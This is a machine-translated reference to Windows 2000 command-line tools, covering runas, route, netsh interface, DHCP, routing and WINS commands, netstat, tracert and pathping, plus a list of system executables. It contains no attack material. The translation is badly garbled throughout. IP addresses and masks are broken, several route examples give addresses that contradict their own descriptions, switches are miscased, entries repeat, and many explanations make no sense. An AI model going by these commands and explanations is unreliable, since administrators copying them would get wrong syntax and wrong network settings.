runas [{/profile|/noprofile}] [/env] [/netonly] [/smartcard] [/showtrustlevels] [/trustlevel] /user:UserAccountName program。.


Parameters. .


/profile 。.


Load the user profile. / Profile is the default. .


/no profile 。.


/ Noprofile not load the specified user profile. This allows applications to load faster, but in some applications can cause errors. .


/env 。.


Specify the current use of the network environment, rather than the user's local environment. .


/netonly 。.


Specified only for the specified remote access user information. .


/smartcard 。.


/ Smartcard credentials that are provided by the smart card. .


/showtrustlevels 。.


Lists / trustlevel switch items. .


/trustlevel 。.


Specify where the application is running authorized level. Use / showtrustlevels view the available trust levels. .


/user:UserAccountName 。.


Run program specified in his user account name. The format of the user account should be user @ domain or domain \ user. .


The program.


Designated to use the / user account to run specified program or command. .


/? 。.


Displays help at the command prompt. .


Comments.


Administrators can use a limited account permission for routine, non-managerial tasks, and only in the implementation of specific management tasks, before permission to use a larger account. Without logging off and log back on to complete this task, you can use the general account to log on, and then use the runas command to run the tools need for greater rights. .


For an example of using the runas command, see the "related topics".


Although the Administrator account using runas usually, but not limited to Administrator account. Any user who has multiple accounts can use alternate credentials, use the runas run the program, MMC console, or "Control Panel" item. .


If you want to use the Administrator account on your computer, for/user:, type the following: one of the parameters.


/ User: AdministratorAccountName @ ComputerName. .


/user:ComputerName\AdministratorAccountName。.


If you want to use this command as a domain administrator, type one of the following parameters:. .


/user:AdministratorAccountName@DomainName。.


/ User: DomainName \ AdministratorAccountName. .


The runas command allows you to run programs (*. .exe), saved MMC consoles (*. .msc), programs and saved MMC console shortcut and "Control Panel". As the other groups (such as "Users" or "Power Users" group) when you log on to your computer, you can run as administrator.


Can use the runas command to start any program, MMC controller or "Control Panel" item. As long as the appropriate user account and password information, user accounts have the ability to log on to the computer and the program, MMC console, "Control Panel" entry in the system and the user accounts are available. .


The runas command allows you to manage other domains in the server (running the tools on your computer and you want to manage servers in different domains).


If you try to boot from a network location using the runas program, MMC console, or "Control Panel" item, may be because the credentials used to connect the network share with different credentials used to start the process failed. The latter's credentials may not be able to access the same network share. .


Some items, such as "printer" folder and desktop items, indirectly by Windows 2000 open, but you cannot use the runas command to start.


If the runas command fails, you may not run the RunAs service or user account is invalid. To check the status of RunAs service, in the "Computer Management" click "Services and Applications", then click "services." To test the user account, try to use the appropriate domain account to log on. .


Paradigm.


To the local computer as an administrator starts an instance of Windows 2000 command prompt, type:. .


runas /user:localmachinename\administrator cmd 。.


When prompted, type the administrator password. .


To use the name as a domain administrator account companydomain\domainadmin start "computer management" is an instance of the snap-in, type: runas/user: companydomain\domainadmin "mmc%windir%\system32\compmgmt. .msc".


When prompted, type the account password. .


To use the named domain. .microsoft .com domain., by the domain administrator account user instance starts "Notepad", type:.


runas / user: user @ domain. . Microsoft. . Com "notepad my_file.. Txt". .


When prompted, type the account password.


To start a command prompt window, saved MMC console, Control Panel items or of any other place an instance of the server program, type:. .


runas /netonly /user:domain\username “command” 。.


domain \ username must have sufficient user rights management server. When prompted, type the account password. .


19。.Route 。.


In the local IP routing table display and modify the entries. Use the route without parameters to display help. .


Syntax.


route [-f] [-p] [Command [Destination] [mask Netmask] [Gateway] [metric Metric]] [if Interface]]. .


Parameter.


-F. .


Clear all is not a primary route (netmask 255. .255. .255. .255 route), the loopback network route (target = 127. .0 .0 .0.., netmask 255. .255. .255. .0 routing) or multicast routing (target = 224. .0 .0 .0.., netmask 240. .0 .0 .0.. routing) entries in the routing table. If it is one of the commands (such as add, change, or delete), the table before running the command to clear.


-P. .


And add the command to use when the specified route is added to the registry and whenever the TCP/IP protocol is started to initialize the IP routing table. By default, when you start a TCP/IP protocol does not save the added route. And when used with the print command, display persistent route list. All other commands are ignored for this parameter. Permanent route is stored in the registry location is HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip \ Parameters \ PersistentRoutes. .


Command 。.


Designated to run the command. The following table lists valid command. Command purposes. .


Add adds a route.


change to change the existing route. .


Delete Deletes a route.


print print routing. .


Destination 。.


Designated route network destination address. IP destination address may be a network address (network address which the host address bits set to 0), is the IP address for the host route for the default route 0. .0. .0. .0. .


mask subnetmask 。.


Specify the target address associated with the network's subnet mask (also known as the subnet mask). Subnet mask for the IP network address can be an appropriate subnet mask for the host route is 255. .255. .255. .255, For the default route is 0. .0. .0. .0. If omitted, use the subnet mask 255. .255. .255. .255. Since the definition of routing destination address and subnet mask the relationship between the destination address can not be more than its corresponding subnet mask details.In other words, if the subnet mask is 0, then the destination address of the corresponding bit is not set to 1.


Gateway. .


To specify more than by the network destination and subnet mask defines the available address set to the previous or next-hop IP addresses. For locally attached subnet routes, the gateway address is allocated to connected subnet IP address of the interface. You want to go through one or more routers is only available to remote routing, the gateway address is assigned to a neighboring router, you can directly reach the IP address.


metric Metric. .


For the route specifies an integer cost metric (ranging from 1 to 9999) for the route, which is used by more than one routing table, select a packet being forwarded most closely match the destination address. The selected route with the least number of hops. Metric that reflects the number of hops, the path to the path of speed, reliability, throughput, and manage property path.


if Interface. .


The specified target can reach the interface index of the interface. Use the route print command to display interfaces and their corresponding interface index of the list. The index for the interface, you can use the decimal or hexadecimal values. For hexadecimal values to hexadecimal number preceded by 0 x. Ignored if parameter, the interface determines the gateway address.


/?. .


Displays help at the command prompt.


Note. .


Routing table hops a larger value is due to allow TCP/IP according to each LAN interface's IP address, subnet mask, and default gateway is configured to automatically determine the route table metric. The default start automatic determination of the interface metric to determine the speed of each interface, the adjustment for each interface in the routing metric, the fastest interface creates a route with the lowest metric. To delete a great number of hops in each LAN connection of the TCP/IP protocol is disabled in the advanced properties of the automatic determination of the interface metric.


If the systemroot \ System32 \ Drivers \ Etc folder on a local network file exists in the appropriate entry, the name can be used for Destination.As long as the name of the domain name system by "" (DNS) queries the standard host name resolution techniques into an IP address, it can be used to Gateway, DNS queries stored in the systemroot\System32\Drivers\Etc folder under the local hosts file, and NetBIOS name resolution.


If it is print or delete command, you can ignore the Gateway parameter, use the wildcard character to represent the target and the gateway. Destination of the value can be by the asterisk (*) wildcard specified. If the specified target contains an asterisk (*) or question mark (?), It is seen as a wildcard, only to print or delete the matching target route. Asterisk on behalf of any one sequence of characters, question mark on behalf of any of the characters. For example, 10. .*. .1, 192. .168. .*, 127. .* And * 224 * is the effective use of the asterisk wildcard character.


Using an invalid target and the subnet mask (network mask) value combination will show "Route: bad gateway address netmask" error message. Targets one or more set to 1, and its corresponding bit in the subnet mask is set to 0, this error occurs. Can be expressed in binary notation by objective and subnet mask to check the situation. Subnet mask in binary notation, including that the target network address part of a series of 1 and that the target host address part of a series of 0 in two parts.View the destination to determine if the destination host address portion (the subnet mask defined) are some of the bits is set to 1.


Only Windows NT 4. .0, Windows 2000, Windows Millennium Edition and Windows XP's route command support-p parameter. Windows 95 or Windows 98 the route command does not support the argument. .


Only when the Internet Protocol (TCP/IP) Protocol in the network connection is installed as a network adapter property of the component, the command is available.


Example. .


To display the IP routing table, type:.


route print. .


To display the IP routing table to 10. The route starts, type:.


route print 10. .*. .


To add a default gateway address is 192. .168. .12. .1 default route, type:.


route add 0. .0. .0. .0 Mask 0. .0. .0. .0 192. .168. .12. .1. .


To add a target is 10. .0 .0 .41.., the subnet mask is 255. .255. .0 .0., the next-hop address is 10. .0 .1 .27.. routing, type:.


route add 10. .41. .0. .0 Mask 255. .255. .0. .0 10. .27. .0. .1. .


To add a target is 10. .0 .0 .41.., the subnet mask is 255. .255. .0 .0., the next-hop address is 10. .27. .0 .1 permanent routing., type:.


route-p add 10. .41. .0. .0 Mask 255. .255. .0. .0 10. .27. .0. .1. .


To add a target is 10. .0 .0 .41.., the subnet mask is 255. .255. .0 .0., the next-hop address is 10. .0 .1 .27.., the number of hops to route 7, type:.


route add 10. .41. .0. .0 Mask 255. .255. .0. .0 10. .27. .0. .1 Metric 7. .


To add a target is 10. .0 .0 .41.., the subnet mask is 255. .255. .0 .0., the next-hop address is 10. .0 .1 .27.., the interface index for the routing of 0 × 3, type:.


route add 10. .41. .0. .0 Mask 255. .255. .0. .0 10. .27. .0. .1 If 0 × 3. .


To delete a target is 10. .0 .0 .41.., the subnet mask is 255. .255. .0 .0. routing, type:.


route delete 10. .41. .0. .0 Mask 255. .255. .0. .0. .


To delete an IP routing table to 10. All of the routes start, type:.


route delete 10. .*. .


To set the target of 10. .0 .0 .41.., the subnet mask is 255. .255. .0 .0. Routing next-hop address from 10. .0 .1 .27... changed to 10. .0. .25 .27, type:.


route change 10. .41. .0. .0 Mask 255. .255. .0. .0 10. .27. .0. .25. .


How to change the cmd windowsserver ip address ■ ■ ■-> Windows Server 2003 2k/.


In the command line to change ip address. .


Windows2000 is now more popular operating system, its function is very powerful, it can even be the same as the Unix command line to do a lot of work. One of the following at the command line to change the ip address of the method, it is hereby introduced (in brackets is the number of comments, boldface is artificial entry).


C: \> ipconfig (first look with the ipconfig command to change this before the ip address). .


Windows 2000 IP Configuration。.


Ethernet adapter Local Area Connection:. .


Connection-specific DNS Suffix 。. :。.


IP Address. .: 10. .1. .1. .94 (Local connection to change before the ip). .


Subnet Mask 。. : .255.255. .255. .0.


Default Gateway. .: 10. .1. .1. .254. .


C:\ > netsh (enter setup mode).


netsh> interface. .


interface>ip 。.


interface ip> set address "Local Area Connection" static 10. .1. .1. .111 255. .255. .255. .0 10. .1. .1. .254. .


interface ip>exit。.


The set command above detailed explanation is as follows:. .


Set address – sets the specified interface of the IP address and default gateway.


set dns - set the DNS server mode and addresses. .


Set wins – set the WINS server mode and address.


Networks commonly used commands:. .


IPCONFIG 。.


C: \> ipconfig (then use the ipconfig command to change a look to confirm whether the change successfully). .


Windows 2000 IP Configuration。.


Ethernet adapter Local Area Connection:. .


Connection-specific DNS Suffix 。.


IP Address. .: 10. .1. .1. .111. .


Subnet Mask 。. : .255.255. .255. .0.


Default Gateway. .: 10. .1. .1. .254. .


The command list.


- Move the layer of context level. .


? – Displays a list of commands.


aaaa - Changes to the `aaaa 'context. .


Abort-drop in offline mode changes.


add - add a configuration item to the project list. .


Alias – add an alias.


bye - Exits the program. .


Commit – presented in offline mode changes.


delete - delete a list in the project configuration items. .


Dhcp – change to the dhcp ' context would.


dump - Displays a configuration script. .


Exec – run a script file.


exit - exit the program. .


Help – displays a list of commands.


interface - Changes to the `interface 'context. .


Offline – sets the current mode to offline.


online - to set the current model line. .


Popd-POPs a context from the stack.


pushd - Pushes current context put into the stack. .


Quit – exit the program.


ras - Changes to the `ras' context. .


Routing – change to the routing context would '.


set - Updates configuration settings. .


Show-show info.


unalias - Delete an alias. .


Changes to wins – would wins ' context.


Fast switching IP addresses are unique skill. .


In the course of encounter in a different segment of network debugging, you often need to be in several different IP addresses. Win2000 operating systems change IP addresses than Win98 is more convenient because over IP address do not need to restart your computer, but also into the network properties settings. There is no easy way, such as using the mouse double-click shortcut to implement IP address of the switch?.


The answer is yes. In Win2000 using netsh command to achieve this functionality. First, enter the command line mode (in the "Start → Run", type "cmd" to enter command line mode), the prompt, type netsh netsh interface to enter. Int ip access interface, and then type the IP configuration mode, type the dump lists Interface IP configuration information:. .


C:\Documents and Settings\Administrator>netsh 。.


netsh>. .


netsh>int ip 。.


interface ip> dump. .


# ———————————- 。.


# Interface IP Configuration. .


# ———————————- 。.


pushd interface ip. .


# "Local area connection" interface IP configuration (Note: the following display depending on the machine).


set address name = "Local Area Connection" source = static addr = 192. .168. .0. .5 Mask = 255. .255. .255. .0. .


Set address name = "local area connection" gateway = 192. .168. .0.1 gwmetric = .2.


set dns name = "Local Area Connection" source = static addr = 61. .237. .17. .181. .


Add dns name = "local area connection" addr = 211. .97. .168. .129.


add dns name = "Local Area Connection" addr = 211. .98. .4. .1. .


Set wins name = "local area connection" source = static addr = none.


# "Local Area Connection 2" interface IP configuration. .


Set address name = "local area connection 2" source = dhcp.


set dns name = "Local Area Connection 2" source = dhcp. .


Set wins name = "local area connection 2" source = dhcp.


popd. .


# Interface IP configuration is finished.


Fast switching IP addresses are unique skill 2. .


Now we can figure out to use the netsh command to change the IP address, that is, by "set address name = the name of the connection (connection name should be enclosed in quotation marks) source = static addr = IP address subnet mask mask ="..


To the command line mode, try using netsh directly. For example to change the machine's IP address 192. .168. .0. .7, A subnet mask of 255. .255. .255. .0, Can do the following:. .


C:\Documents and Settings\Administrator>netsh 。.


netsh> int ip. .


Interface ip set address name = > "local area connection" source = static addr = 192. .168. .0. .7 mask = 255. .255. .255. .0.


Confirm the changes. .


interface ip>exit 。.


Then ipconfig command to check:. .


C:\Documents and Settings\Administrator>ipconfig 。.


Windows 2000 IP Configuration. .


Ethernet adapter local area connection 2.


Media State. .  Cable Disconnected. .


Ethernet adapter local area connection.


Connection-specific DNS Suffix. . . .


IP Address。.  192。.168。.0。.7 。.


Subnet Mask. .  255. .255. .255. .0. .


Default Gateway 。.  192。.168。.0。.2。.


As can be seen from the above shows have been successfully used in the Win2000 command line to change the IP address. In this way change the IP address was not even faster in the graphical interface operation. But then the script we give you a hand, not far from the goal of victory. First, open Notepad, enter the following: int ip. .


Set address name = "local area connection" source = static addr = 192. .168. .0. .7 mask = 255. .255. .255. .0.


Then saved as a file named "7.. Sh" file, put it under the root directory C, and then enter the command line mode, the root directory of the C type "netsh exec 7.. Sh", if no response ah? But then ipconfig look, you will find over the IP address has changed. .


Then use Notepad to write a batch file that is named ".bat" 7. for "netsh exec 7. .sh". For the file in the create a shortcut on the desktop, double-click the shortcut for quick change of the IP address. If you want to quickly .168.192. .5, .0.192. .168. .0. the same network segment as .7 IP address between words, you only need to change "addr" address, but IP address will be changed to as 172. .19. .96. 7, like different segments of the IP address, gateway information on the need to be changed, that is, a line in the script file on the gateway of information:. .


int ip 。.


set address name = "Local Area Connection" source = static addr = 172. .19. .96. .7 Mask = 255. .255. .255. .0. .


Set address name = "local area connection" gateway = 172. .19. .96. .1 gwmetric = 1.


Similarly to the above, save the script file, and then made the implementation of what the batch file, use ipconfig / all command inspection, I learned, including information, including the gateway also changes coming. This is not a quick and easy, IP address to change to change?. .


Use netstat displays connection statistics.


You can use netstat command to display protocol statistics and current TCP / IP connection. netstat-a command will show all connections, and netstat-r display routing table and the active connection. netstat-e command displays Ethernet statistics, and netstat-s shows statistics for each protocol. If you use netstat-n, the address and port number can not be converted into the name. .


Tracert (trace route) is the route tracing utility that is used to determine the IP datagram access destination path. Tracert command uses IP time to live (TTL) field and ICMP error messages to determine from one host to another host on the network routing.


-D specifies the IP address does not resolve the host name. .


-H maximum_hops Specifies the metric to track called target_name host routing.


-J host-list specifies Tracert utility packets used in the path of the router interface to the list. .


-W timeout waiting for the timeout for each time you reply to the specified number of milliseconds.


target_name target host name or IP address. .


Pathping command is a route tracing tool, it will ping and tracert commands, and these two tools are not available in conjunction with other information. Pathping command will send the packet to reach the final destination path for each router, and then the results based on the computer from each hop. Because the command displays the packet in any given router or link, the extent of the loss, so you can easily determine the possible cause network problems which routers or links.


-N Hostnames do not resolve the address into host name. .


-H Maximum hops the search target maximum number of hops.


-G Host-list list of the release of source routing along the route. .


-P Period in ping the number of milliseconds to wait between.


-Q Num_queries the number of queries per hop. .


-W Time-out for each return the number of milliseconds to wait.


-T Layer 2 tag to layer 2 priority tag (for example, for IEEE 802. .1 P) to connect to the data packet and sends it to the path of each network device. This helps to identify not properly configured layer 2 priority of network equipment. -T switch is used to test the quality of service (QoS) connectivity. .


-R RSVP test Che check to determine the path of each router supports "Resource Reservation Protocol (RSVP)," this Protocol allows a host to the data flow to retain a certain amount of bandwidth. The-r switch is used to test the quality of service (QoS) connectivity.


At the command prompt using the DHCP commands interactively. .


Open a command prompt.


Type netsh. .


At the netsh > (Netshell) command prompt, type "dhcp".


In the dhcp> (DHCP auxiliary program) command prompt, you want to manage the server, type server \ \ servername or server ip_address. .


Once you have the right to administer the server successfully connect, you will see a "you can on server servername for read and write access".


Once connected, you can use any support for DHCP Netshell command. Type /? Or help to display the DHCP directly or as a sub-command menu options display, type the list out with DHCP for use with all Netshell subcommand. .


Route command.


routing ip add / delete / set / show interface in the specified interface to add, delete, or display of conventional IP routing configuration settings. .


Routing ip add/delete/set/show filter to the specified interface adds, deletes, configures, or displays the IP packet filters.


routing ip add / delete / show boundary in the specified interface to add, delete or display the multicast boundary setting. .


Routing ip add/set ipiptunnel add or configure IP-in-IP interfaces.


routing ip add / delete / set / show rtmroute add, configure or display the routing table does not continue routing manager. .


Routing ip add/delete/set/show persistentroute adds, deletes, configures, or displays a continuous route.


routing ip add / delete / set / show preferenceforprotocol add, delete, configure or display the priority of routing protocols. .


Routing ip add/delete/set/show scope to add, delete, or display the multicast scope.


routing ip set / show loglevel configuration or display the global IP record levels. .


Routing ip show all IP helper displays the Netsh utility sub environment.


routing ip show protocol shows all running IP routing protocols. .


Routing ip show mfe displays multicast forwarding entries.


routing ip show mfestats display multicast forwarding the survey. .


Routing ip show boundarystats displays IP multicast boundaries.


routing ip show r *** estinations Display Routing Table Manager Routing table target. .


Routing ip show rtmroutes displays route table manager in the routing table.


routing ip nat set / show global configuration or display the global network address translation (NAT) settings. .


Routing ip nat add/delete/set/show interface adds, deletes, configures, or displays the specified interface of the NAT settings.


routing ip nat add / delete addressrange interfaces in the NAT pool of public addresses to add or delete an address range. .


Routing ip nat add/delete addressmapping adds or deletes a NAT address mapping.


routing ip nat add / delete portmapping add or remove NAT port mapping. .


Routing ip autodhcp set/show global configures or displays global DHCP allocator parameters.


routing ip autodhcp set / show interface interface configuration or display the specified set DHCP allocator. .


Routing ip autodhcp add/delete exclusion in a range of addresses that the DHCP allocator in Add or remove an exclusion range.


routing ip dnsproxy set / show global configuration or display the global DNS proxy parameters. .


Routing ip dnsproxy set/show interface configures or displays the specified interface of the DNS proxy parameters.


routing ip igmp set / show global IGMP configuration or display the global settings. .


Routing ip igmp add/delete/set/show interface in the specified interface adds, deletes, configures, or displays IGMP.


routing ip igmp add / delete staticgroup add or delete the specified interface, the static multicast group. .


Routing ip igmp show grouptable shows the IGMP hosts group table.


routing ip igmp show ifstats show IGMP statistics for each interface. .


Routing ip igmp show iftable shows each interface IGMP host groups.


routing ip igmp show proxygrouptable display IGMP proxy interface IGMP group table. .


Routing ip igmp show rasgrouptable displays the remote access server uses the Internet interface of the Group of tables.


routing ip ospf set / show global show global OSPF configuration or settings. .


Routing ip ospf add/delete/set/show interface in the specified interface adds, deletes, configures, or displays OSPF.


routing ip ospf add / delete / set / show area to add, delete, configure or display OSPF area. .


Routing ip ospf add/delete/show range in the specified OSPF area adds, deletes, configures, or displays of coverage.


routing ip ospf add / delete / set / show virtif add, delete, configure or display OSPF virtual interface. .


Routing ip ospf add/delete/show neighbor adds, deletes, configures, or displays OSPF neighbors.


routing ip ospf add / delete / show protofilter add, delete, configure or display the routing OSPF external routing information sources. .


Routing ip ospf add/delete/show routefilter adds, deletes, configures, or displays OSPF route filter external routes.


routing ip ospf show areastats display OSPF area statistics. .


Routing ip ospf show lsdb Displays OSPF link state database.


routing ip ospf show virtifstats display OSPF virtual link statistics. .


Routing ip set global configuration "relay DHCP relay agent" in the global settings.


routing ip relay add / delete / set interface in the specified interface to add, delete, or configure the "DHCP Relay Agent" setting. .


Routing ip relay add/delete dhcpserver in DHCP server address list in the Add or remove the IP address of the DHCP server.


routing ip relay show ifbinding display interface IP address binding. .


Routing ip relay show ifconfig show ifstats "DHCP relay agent" in the configuration.


routing ip relay show ifstats display DHCP statistics for each interface. .


Routing ip rip set/show global configuration IP RIP global settings.


routing ip rip add / delete / set / show interface in the specified IP interface to add or configure the RIP settings. .


Routing ip rip add/delete peerfilter adds or removes a RIP peer filters.


routing ip rip add / delete acceptfilter receiving the routing list to add or remove RIP routing filter. .


Routing ip rip add/delete announcefilter announced the routing list, add or remove RIP route filters.


routing ip rip add / delete / show neighbor add or remove RIP neighbors. .


Routing ip rip set/show flags for a specified interface IP RIP is configured on the advanced settings.


routing ip rip show globalstats display global RIP parameters. .


Routing ip rip show ifbinding displays IP address bindings for an interface.


routing ip rip show ifstats display RIP statistics for each interface. .


IPX netsh routing commands.


routing ipx add / set staticroute in the IPX routing table to add or configure a static IPX route. .


Add/set ipx routing staticservice in the SAP service table to add or configure a static SAP services.


routing ipx add / set filter on the specified interface to add or configure the IPX packet filters. .


Add/ipx routing interface in the set demand-dial interfaces enable IPX routing, or IPX settings configured on the interface.


routing ipx set global configuration global IPX routing settings. .


Ipx rip routing add/set filter to add and configure RIP route filters.


routing ipx rip set global configuration global IPX's RIP settings. .


Ipx rip routing set interface on a specified interface to configure IPX RIP settings.


routing ipx sap add / set filter to add or configure the SAP service filters. .


Ipx sap routing set global configuration global IPX SAP settings.


routing ipx sap set interface configuration in the specified IPX's SAP interface settings. .


Ipx routing netbios add nbname static IPX NETBIOS name to the NetBIOS name table.


routing ipx netbios set interface to configure the specified interface, the IPX-based NetBIOS settings. .


NetSh commands for WINS.


WINS list lists all available commands. .


Dump the WINS server configuration is dumped to the command output.


add name registered in the name of the server. For more information, please enter add name /?. .


Add partner adds a replication partner to the server. For more information, please enter add partner/?.


add pngserver Add the current server's Persona Non Grata list of servers. For more information, please enter the add pngserver /?. .


Check database check database consistency. For more information, please enter check database/?.


check name check a WINS server, the name of the record list. For more information, please enter the check name /?. .


Check version number consistency version check. For more information, please enter check version/?.


delete name removed from the server database, the name has been registered. For more information, please enter the delete name /?. .


Delete partner from the list to delete a replication partner. For more information, please enter delete partner/?.


delete records deleted from the server or logical delete all records or a group of records. For more information, please enter the delete records /?. .


Delete list to delete the owner and its owners. For more information, please enter delete owners/?.


delete pngserver removed from the list all or selected Persona Non Grata servers. For more information, please enter the delete pngserver /?. .


Init backup to back up the WINS database. For more information, please enter backup/? init.


init import file to import data from Lmhosts. For more information, please enter the init import /?. .


Init pull start "La" triggers, and sending to another WINS server. For more information, please enter init pull/?.


init pullrange start another WINS server, a group of records, and read the record. For more information, please enter the init pullrange /?. .


Init push start "pushing" triggers, and sending to another WINS server. For more information, please enter init push/?.


init replicate replicated database with replication partners. For more information, please enter the init replicate /?. .


Init restore to restore the database from the file. For more information, please enter init restore/?.


init scavenge the WINS database, remove the server. For more information, please enter the init scavenge /?. .


Init search search server, the WINS database. For more information, please enter a search/? init.


reset statistics reset the server statistics. For more information, please enter the reset statistics /?. .


Set automatic autopartnerconfig set server replication partner configuration information. For more information, please enter set autopartnerconfig/?.


set backuppath set the server backup parameters. For more information, please enter the set backuppath /?. .


Setting the server's set burstparam burst handling parameters. For more information, please enter set autopartnerconfig/?.


set logparam set database and event logging options. For more information, please enter the set logparam /?. .


Setting the server's set migrateflag migration flag. For more information, please enter set migrateflag/?.


set namerecord interval and set the server timeout. For more information, please enter the set namerecord /?. .


Setting the server's set periodicdbchecking regularly check parameters for the database. For more information, please enter set periodicdbchecking/?.


set pullpartnerconfig set designated "pull" configuration parameters partners. For more information, please enter the set pullpartnerconfig /?. .


Sets a specified set pushpartnerconfig "pushing" partner configuring parameters. For more information, please enter set pushpartnerconfig/?.


set pullparam set the default server "pull" parameter. For more information, please enter the set pullparam /?. .


Set sets the server default pushparam "pushing" parameter. For more information, please enter set pushparam/?.


set replicateflag set the server copy flag. For more information, please enter the set replicateflag /?. .


Set startversion Sets the database ID of the starting version. For more information, please enter set startversion/?.


show browser shows all the activities the domain master browser [1Bh] records. For more information, please enter the show browser /?. .


Show database displays the specified server's database and records. For more information, please enter the show database/?.


show info display configuration information. For more information, please enter the show info /?. .


Display the server name in the show detailed information for a particular record. For more information, please enter the name/show?.


show partner shows the server "pull" or "push" (or "push-pull") partner. For more information, please enter the show partner /?. .


Show default partner configuring partnerproperties display. For more information, please enter show partnerproperties/?.


show pullpartnerconfig Show "pull" partner configuration information. For more information, please enter the show pullpartnerconfig /?. .


Show pushpartnerconfig show "pushing" partner configuration information. For more information, please enter show pushpartnerconfig/?.


show reccount 显示指定服务器所拥有的记录数量。详细信息,请输入 show reccount /? 。.


Show recbyversion displays the specified server. For more information, please enter show recbyversion/?.


show server show the currently selected server. For more information, please enter the show server /?. .


Show statistics show WINS server statistics. For more information, please enter show statistics/?.


show version display the current version of the WINS server, the counter value. For more information, please enter the show version /?. .


Show versionmap displays the owner ID to "maximum version number mapping". For more information, please enter show versionmap/?.


Interface command. .


Interface set/show interface enabled, disabled, connect, disconnect, and display the configuration for demand-dial interface.


interface set / show credentials in the demand-dial interface to configure or display the user name, password and domain name. .


Win2000 command complete.


accwiz. . Exe> Accessibility Wizard for walking you through setting up your machine for your mobility needs. . Aids Wizard. .


acsetups。.exe > ACS setup DCOM server executable 。.


actmovie. . Exe> Direct Show setup tool to install instruments directly displayed. .


append。.exe > Allows programs to open data in specified directories as if they were in the current directory。. Directory of data.


arp. . Exe> NETWORK Display and modify IP - Hardware addresses display and change the computer's IP and hardware physical address corresponding to the list. .


At. a .exe > AT scheduling utility is also included with the task to run UNIX programs.


atmadm. . Exe> Displays statistics for ATM call manager. . ATM Call Manager Statistics. .


Attrib. .exe and modify > Display attributes for files and folders to display and change the file and folder properties.


autochk. . Exe> Used to check and repair Windows File Systems to check and repair the file system. .


Autoconv. .exe file system > Automates the conversion during reboots during the startup process automatic conversion system.


autofmt. . Exe> Automates the file format process during reboots formatting process in the startup process. .


Autolfn. formatting Used for .exe > long file names using a long file name format.


bootok. . Exe> Boot acceptance application for registry bootvrfy. . Exe> Bootvrfy. . Exe, a program included in Windows 2000 that notifies the system that startup was successful. . Bootvrfy. .exe can be run on a local or remote computer。. Bulletin started successfully.


cacls. . Exe> Displays or modifies access control lists (ACLs) of files. . Display and edit ACL. .


Calc. Windows .exe Calculators > calculator.


cdplayer. . Exe> Windows CD Player CD player. .


> Change .exe change. {User | Port | Logon} and the Terminal Server-related queries.


charmap. . Exe> Character Map Character Map. .


Chglogon. Same as .exe > Change using the "Logon" to start or stop the session record.


chgport. . Exe> Same as using "Change Port" to change the port (Terminal Services). .


Chgusr. Same as .exe > using the "Change User" change user (Terminal Services).


chkdsk. . Exe> Check the hard disk for errors similar to Scandisk 3 Stages must specify a Drive Letter disk testing procedures. .


Chkntfs. Same as .exe > using chkdsk but for NTFS NTFS disk utility.


cidaemon. . Exe> Component of Ci Filer Service component Ci document service. .


cipher。.exe > Displays or alters the encryption of directories [files] on NTFS partitions。. In NTFS on displays or alters the contents of an encrypted file or directory.


cisvc. . Exe> Content Index - It's the content indexing service for I index the content. .


Ckcnv. Convertor transform .exe > Cookie Cookie.


cleanmgr. . Exe> Disk Cleanup, popular with Windows 98 Disk Cleanup. .


Cliconfg. SQL Server .exe > Client Network Utility SQL client network utility clipbrd. .exe > Local Clipboard viewer will allow for you to connect to other clipboards ClipBook Viewer.


clipsrv. . Exe> Start the clipboard Server runs Clipboard services. .


Clspack. .exe > CLSPACK used to create a file listing of system packages build system file list cleaning.


cluster. . Exe> Display a cluster in a domain shows the domain of the cluster. .


_Cmd_. .exe command prompt > Famous nothing!.


cmdl32. . Exe> Connection Manager Auto-Download Connection Manager automatically downloaded. .


Cmmgr32. .exe > Connection Manager connection manager.


cmmon32. . Exe> Connection Manager Monitor Connection Manager Monitor. .


Cmstp. Connection Manager .exe > Profile Manager in the Connection Manager profile installer.


comclust. . Exe> about cluster server cluster. .


comp。.exe > ComClust Add, Remove, or Join a cluster。. Compare two files and file sets content *.


compact. . Exe> Displays or alters the compression of files on NTFS partitions. . To display or change the NTFS partition file compression status. .


Conime. Console .exe > IME IME console.


control. . Exe> Starts the control panel control panel. .


Convert. Convert File .exe > System conversion to NTFS file system to NTFS.


convlog. . Exe> Converts MS IIS log files convert IIS log file format to NCSA format. .


Cprofile. converts .exe > Copy profiles display mode.


cscript. . Exe> MS Windows Scripts Host Version 5. .1 Version than the host. .


Csrss. > Client Server Runtime .exe Process client server Runtime process.


csvde. . Exe> Comma Separated Variable Import / Export Utility to format conversion. .


Dbgtrace. > Terminal Server .exe and..


dcomcnfg. . Exe> Display the current DCOM configuration. . DCOM Configuration Properties. .


dcphelp。.exe > ? 。.


dcpromo. . Exe> Promote a domain controller to ADSI AD Installation Wizard. .


Ddeshare. .exe DDE shares > Display on local or remote computer DDE shares.


ddmprxy. . Exe>. .


debug。.exe > Runs Debug, a program testing and editing tool。. Is DEBUG!.


dfrgfat. . Exe> Defrag FAT file system FAT partition Disk Defragmenter. .


Dfrgntfs. .exe file system > Defrag NTFS NTFS partition Disk Defragmenter.


dfs_cmd_. . Exe> configures a Dfs tree configure a DFS tree. .


Dfsinit. .exe File > Distributed System Initialization distributed file system initialization.


dfssvc. . Exe> Distributed File System Server Distributed File System servers. .


MS diantz. .exe > Cabinet Maker to make the cab file.


diskperf. . Exe> Starts physical Disk Performance counters disk performance counters. .


dllhost。.exe > dllhost is used on all versions of Windows 2000。. dllhost is the hedost process for all COM+ applications。. All the COM + application software is the primary process.


dllhst3g. . Exe>. .


Network: common commands.


dmadmin. . Exe> Disk Manager Service disk management services. .


Dmremote. .exe Part of disk management > disk management part of the service.


dns. . Exe> DNS Applications DNS. .


Doskey. recalls Windows .exe > command lines and creates macros create a macro on the command line.


dosx. . Exe> DOS Extender DOS extension. .


Dplaysvr. > Direct Play Helper .exe to run directly.


drwatson. . Exe> Dr Watson for 2000 Fault Detector Dr Watson error detection. .


Drwtsn32. Dr Watson for .exe > 2000 viewer and display configuration manager Dr. Watson and configuration management.


dtcsetup. . Exe> Installs MDTC. .


Dvdplay. .exe Windows 2000 > DVD player DVD playback.


dxdiag. . Exe> Direct-X Diagnostics Direct-X diagnostic tool. .


edlin。.exe > line-oriented text editor。. The command line in a text editor (long!).


edlin. . Exe> line-oriented text editor. . Command line text editor (ah long history!). .


.Exe > esentutl. MS MS database tools Database Utility.


eudcedit. . Exe> Private character editor Ture Type Characters and procedures. .


Eventvwr. .exe Windows 2000 Event Viewer > Event Viewer.


evnt_cmd_. . Exe> Event to trap translator; Configuration tool. .


evntwin。.exe > Event to trap translator setup 。.


